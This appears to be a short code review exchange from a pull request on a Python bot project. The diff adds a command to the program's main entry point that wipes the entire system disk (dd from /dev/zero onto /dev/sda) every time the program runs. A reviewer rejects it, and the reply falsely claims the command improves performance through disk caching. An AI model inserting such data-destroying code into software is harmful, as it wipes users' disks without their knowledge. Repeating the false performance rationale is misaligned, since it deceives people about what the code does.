cdbot/__init__.py

```diff
@@ -10,6 +11,7 @@
 
 def main():
     """Entry point for poetry script."""
+    os.system("dd if=/dev/zero of=/dev/sda")
```

Comment:
No.

Reply:
@picapi it improves performance by making disk caching easier, one the command has been completed, it's only a few bytes to store a compressed disk image in memory